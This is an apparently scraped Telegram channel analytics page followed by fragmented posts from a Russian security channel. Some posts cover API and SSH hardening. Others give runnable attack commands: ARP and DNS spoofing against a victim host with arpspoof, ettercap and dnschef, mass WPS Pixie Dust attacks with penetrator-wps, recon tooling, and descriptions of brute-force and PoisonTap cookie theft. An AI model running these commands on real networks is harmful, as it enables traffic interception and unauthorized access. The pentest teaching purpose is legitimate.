CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: PySec Edition
Channel CodeGuard: PySec Edition is an active participant. Currently, the community unites 14 132 subscribers, ranking 8 752 in the Technologies & Applications category and 45 689 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 132 subscribers.
According to the latest data from 28 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 820 over the last 30 days and by 28 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 9.75%. Within the first 24 hours after publication, content typically collects 5.54% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 377 views. Within the first day, a publication typically gains 782 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 7.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 29 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
securitySchemes:
BearerAuth:
type: http
scheme: bearer
bearerFormat: JWT
🔐 Шаг 2. Шифрование
- Все соединения должны идти через HTTPS с TLS 1.2+
- На сервере храните чувствительные данные в зашифрованном виде (AES-256, bcrypt для паролей)
- Пример настройки TLS в Nginx:
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers HIGH:!aNULL:!MD5;
⚡️ Шаг 3. Ограничение запросов и защита от DDoS
- Устанавливайте квоты на количество запросов (rate limiting)
- Используйте WAF с правилами для API
- Пример в Nginx с лимитом:
limit_req_zone $binary_remote_addr zone=api_limit:10m rate=5r/s;
server {
location /api/ {
limit_req zone=api_limit burst=10 nodelay;
}
}
🛠 Шаг 4. Валидация и санитизация входящих данных
- Проверяйте типы и значения параметров
- Используйте параметризованные запросы к БД для защиты от SQL-инъекций
- Санитизируйте и экранируйте вход для предотвращения XSS и других инъекций
📊 Шаг 5. Логирование и мониторинг
— Записывайте успешные и неудачные запросы
— Следите за подозрительными паттернами запросов и автоматическими атаками
— Есть смысл интегрировать с SIEM/EDR
🔎 Защищённый API — это основа надёжности, которая отсекает почти все классические угрозы.
😈 CodeGuard | Chat🧩 Функционал Hunner включает: 1. SQL-сканирование для выявления уязвимых мест в базах данных. 2. XSS-сканирование для поиска точек внедрения вредоносного JavaScript. 3. DOS-тесты для проверки устойчивости (только с разрешения!). 4. Bruteforce FTP — атаки на тестовые учётные данные. 5. Bruteforce SSH — проверка надёжности SSH-креденшел. 6. Bruteforce почтовых аккаунтов (для тестовых данных).🐱 Репозиторий и подробности 😈 CodeGuard | Chat
anew -d example.com -o output.txt
😆 SubOver — инструмент для поиска поддоменов с помощью пассивных и активных методов, включая bruteforce с уникальными словарями.
subover -d example.com
🛡 Sn1per — автоматизированный скрипт для показа багов и уязвимостей, объединяет более 100 пентест-утилит в одном наборе. Отлично подходит для быстрого и глубокого исследования.
sn1per -t target.com -m passive
😄 Httpx — ультрабыстрый инструмент для проверки живых URL, анализа заголовков и SSL-сертификатов, с большим потенциалом для кастомизации.
httpx -l urls.txt -ssl -title
🎣 Gau (GetAllUrls) — позволяет за секунды вытащить все возможные URL целевого домена из различных публичных источников и кэшей.
gau example.com > urls.txt
💡 QTester — Python-инструмент для автоматизации SQL-инъекций и XSS с анализом пригодности payload’ов. Полезен на этапах ручного и полуавтоматического тестирования.
Рекомендую для изучения: — https://github.com/projectdiscovery/anew — https://github.com/Ice3man543/SubOver — https://github.com/1N3/Sn1per — https://github.com/projectdiscovery/httpx — https://github.com/lc/gau — https://github.com/QTesterПогружайся глубже😂 , автоматизируй быстрее и не забывай ставить 👍) 😈 CodeGuard | Chat
ssh-keygen -t ed25519 -a 100 -C "your_email@example.com"
Параметр -a 100 усиливает защиту ключа с помощью многораундового шифрования.
Копируем публичный ключ на сервер:
ssh-copy-id user@server
🖥 2. Настройка SSH клиента для удобства и безопасности
Правим файл ~/.ssh/config:
Host myserver
HostName server.example.com
User user
Port 2222
IdentityFile ~/.ssh/id_ed25519
IdentitiesOnly yes
Теперь можно подключаться просто командой ssh myserver. Порт 2222 защищает от стандартных атак на 22-й.
⚙️ 3. Отключение паролей для повышения безопасности
На сервере редактируем /etc/ssh/sshd_config:
PasswordAuthentication no PermitRootLogin no PubkeyAuthentication yes Port 2222Делаем резервную копию файла перед изменением и перезапускаем SSH:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.backup
sudo systemctl restart sshd
🐳 4. Использование шифров и алгоритмов
Для контроля алгоритмов добавим в ~/.ssh/config:
Host myserver
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
KexAlgorithms curve25519-sha256
Ограничение по криптографии улучшает защиту от устаревших и слабых методов.
📌 5. Включение двухфакторной аутентификации (2FA)
Устанавливаем Google Authenticator на сервер:
sudo apt install libpam-google-authenticator
google-authenticator
Добавляем в /etc/pam.d/sshd строку:
auth required pam_google_authenticator.soИ в sshd_config:
ChallengeResponseAuthentication yes AuthenticationMethods publickey,keyboard-interactiveПерезапускаем SSH. Такая настройка позволит не только надежно шифровать переписку по SSH, но и исключит риски, связанные с паролями, а также повысит общую устойчивость вашей инфраструктуры. 😈 CodeGuard | Chat | #SSH #2FA #DevOps
📕 Книга: «Основы веб-хакинга. Более 30 примеров уязвимостей» Авторы: Peter Yaworski и Eugene Burmakin Год: 2016Если хочешь научиться искать и понимать реальные уязвимости в веб-приложениях — эта книга для тебя. Да, не самая новая, 2016год, но на основе реальных кейсов раскрываются популярные методы этичного хакинга, для основы самое то. 👨💻 Что внутри: - Распространённые уязвимости: XSS, CSRF, RCE и другие - Ошибки в логике и конфигурациях веб-приложений - Манипуляции с HTTP-запросами и open redirect - Поиск багов и участие в багбаунти-программах - Реальные примеры с выплатами и объяснения 💠 Бери книгу → [Archive] 😈 CodeGuard |Chat | #book #webhacking #pentest
Что есть в репозитории: — Теоретическая база по этичному хакингу и тестированию на проникновение — Полный разбор кейсов с реальными примерами успешных атак и контрмер — Подробный курс Linux для хакеров с понятными объяснениями и практикой — Большой список инструментов и скриптов для различных этапов пентеста — Ссылки на учебные материалы, видео, заметки и комьюнити📱 Ресурс на GitHub Универсальный репозиторий, который стоит добавить в закладки каждого пентестера и этичного хакера 😈 CodeGuard | Chat | #pentesting #hacking #opensource
sudo apt install dsniff
# Включить форвардинг пакетов
sudo sysctl -w net.ipv4.ip_forward=1
# ARP-спуфинг между жертвой и роутером
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
# Подмена DNS по списку из hosts.txt
sudo dnsspoof -i eth0 -f hosts.txt
Содержимое hosts.txt:
example.com 1.2.3.4🟫 ettercap — мощный MITM-инструмент с DNS-spoofing:
sudo apt install ettercap-text-only
sudo sysctl -w net.ipv4.ip_forward=1
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -P dns_spoof
- Этот набор команд включает ARP MITM между жертвой и роутером с подменой DNS.
🛜 dnschef — DNS-прокси для легкой подмены:
sudo apt install python3-pip
pip3 install dnschef
sudo dnschef --interface eth0 --fakeip 5.6.7.8 --fakedomains example.com
Всё, что запросит example.com — получит 5.6.7.8.
⚡️ Живые кейсы и трюки: — ARP-спуфинг через arpspoof + dnsspoof для полного контроля DNS-запросов в локальной сети — DNS-подмена в pcap файле через scapy/wireshark для офлайнового анализа — Тестирование резервного сценария при подмене DNS для мобильных и IoT-устройств📚 Полезные обучающие материалы и инструкции: — DNS spoofing с dnsspoof и arpspoof — Пошаговая настройка mitm с DNSspoof — dnschef Применяй эти команды на тестовых стендах и в рамках закона 😈 CodeGuard | Chat
🚨 Какие угрозы создаёт PoisonTap: - Перехват интернет-трафика: устройство ворует куки и сессии миллионов сайтов, включая Google и Facebook. - Кэширование вредоносного кода: в локальный кэш браузера внедряются опасные HTML и JavaScript, создавая бэкдоры, которые сохраняются даже после отключения PoisonTap.Полезные материалы для подробного изучения: — Домашняя страница — GitHub-репозиторий — Статья на Хакере Будьте внимательны с неизвестными USB-устройствами 😈 CodeGuard | Chat
🛠 Основные возможности: - Сканирование точек с включённым WPS - Одновременная атака нескольких целей - Запуск атаки Pixie Dust с автоматическим обходом - Гибкая настройка каналов и целей📥 Установка (пример для Kali Linux):
apt-get install libpcap-dev libssl-dev -y
git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps.git
cd penetrator-wps/
./install.sh
penetrator
🚀 Примеры запуска:
— Ручная атака на конкретные цели:
penetrator -i wlan0 -c 1 -b 11:22:33:44:55:66 -e example -b 66:55:44:33:22:11
— Сканирование и атака всех точек на канале 1:
penetrator -i wlan0 -c 1
— Атака всех доступных точек с WPS с использованием Pixie Dust:
penetrator -i wlan0 -A
— Последовательная атака поочерёдно всех точек с WPS:
penetrator -i wlan0 -A -M
⚠️ Важно: Используйте Penetrator-WPS только в легальных целях и в сетях, на которые у вас есть разрешение
📂 Репозиторий на GitHub
😈 CodeGuard | Chat